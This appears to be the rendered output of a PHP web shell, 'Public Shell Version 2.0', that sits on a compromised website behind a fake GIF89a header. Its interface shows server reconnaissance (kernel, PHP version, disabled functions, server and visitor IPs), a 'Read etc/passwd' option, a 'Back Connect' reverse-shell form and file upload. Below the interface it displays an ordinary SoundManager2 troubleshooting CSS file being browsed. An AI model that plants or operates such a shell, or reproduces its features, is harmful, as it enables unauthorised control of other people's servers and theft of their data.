GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 13.58.215.45
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/assets/plugins/soundmanager/troubleshoot/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/assets/plugins/soundmanager/troubleshoot/debug.css

/* SM2 troubleshooting CSS */

#sm2-test {
 position:relative;
 background:#f6f6f6;
 border:1px solid #eee;
 padding:3px;
}

#sm2-test,
#sm2-test ul.items {
 border-radius:3px;
}

#sm2-test ul.items {
 position:relative;
 background:#fff;
 list-style-type:none;
 margin:0px;
 padding:0px;
 border:1px solid #ccc;
}

#sm2-test ul.items li {
 position:relative;
 margin-left:0.5em;
 padding-left:0.5em;
 margin-right:0.5em;
 padding-right:0.5em;
}

#sm2-test ul.items li h3 {
 padding-top:0.3em;
 margin-top:0px;
 border-bottom:1px solid #ccc;
 border-top: none;
}

#sm2-test ul.items li:last-child h3 {
 border-bottom:none;
}

#sm2-test ul.items li div.details {
 border-bottom:1px solid #ccc;
}

#sm2-test ul.items li:hover div.details {
 border-bottom:1px solid #ccc;
}

#sm2-test ul.items li.open:last-child h3,
#sm2-test ul.items li.fail:last-child h3,
#sm2-test ul.items li:last-child div.details:last-child {
 border-bottom:1px solid #fff;
}

#sm2-test ul.items li div.details {
 display:none; 
}

#sm2-test ul.items li.open div.details,
#sm2-test ul.items li.unknown div.details,
#sm2-test ul.items li.fail div.details {
 display:block;
}

#sm2-test ul.items li span.yay,
#sm2-test ul.items li span.boo,
#sm2-test ul.items li span.default,
#sm2-test ul.items li span.unknown {
 display:none;
}

#sm2-test ul.items li span.yay,
#sm2-test ul.items li.pass span.msg {
 color:green;
}

#sm2-test ul.items li span.boo,
#sm2-test ul.items li.fail span.msg {
 color:red;
}

#sm2-test ul.items li span.default,
#sm2-test ul.items li.default span.msg {
 color:#ccc;
}

#sm2-test ul.items li span.unknown,
#sm2-test ul.items li.unknown span.msg {
 color:#666;
}

#sm2-test ul.items li.default span.msg {
 display:none; /* hide messages in the event a reset occurs */
}

#sm2-test ul.items li.pass span.yay,
#sm2-test ul.items li.fail span.boo,
#sm2-test ul.items li.default span.default,
#sm2-test ul.items li.unknown span.unknown {
 float:right;
 display:inline;
}

#sm2-container.flash_debug {
 /* flash movie, when soundManager.debugFlash = true */
 position:relative;
 width:auto;
 height:300px;
 width:100%;
 background:#f6f6f6;
 border:1px solid #ccc;
}

#sm2-container.flash_debug object,
#sm2-container.flash_debug embed {
 border:1px solid #fff;
}

Public Shell Version 2.0